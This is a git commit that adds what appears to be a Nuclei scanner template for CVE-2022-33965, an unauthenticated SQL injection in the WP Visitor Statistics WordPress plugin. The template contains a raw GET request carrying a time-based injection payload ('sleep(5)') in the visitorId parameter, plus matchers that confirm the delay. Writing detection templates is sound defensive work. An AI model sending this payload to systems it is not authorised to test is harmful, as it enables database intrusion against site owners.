Added template for CVE-2022-33965

patch-1
Aman 2022-10-09 23:07:38 -07:00
parent a1fd989b5b
commit d520ae2343
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2022-33965
info:
name: WordPress WP Visitor Statistics plugin <= 5.7 - unauthenticated SQL Injection (SQLi)
author: theamanrawat
severity: critical
description: |
Unauthenticated SQL Injection (SQLi) vulnerabilities in Osamaesh WP Visitor Statistics plugin <= 5.7 at WordPress.
reference:
- https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
- https://wordpress.org/plugins/wp-stats-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2022-33965
classification:
cve-id: CVE-2022-33965
metadata:
verified: true
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-stats-manager
requests:
- raw:
- |
@timeout: 15s
GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- type: word
part: body
words:
- "1331' and sleep(5) or '"
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200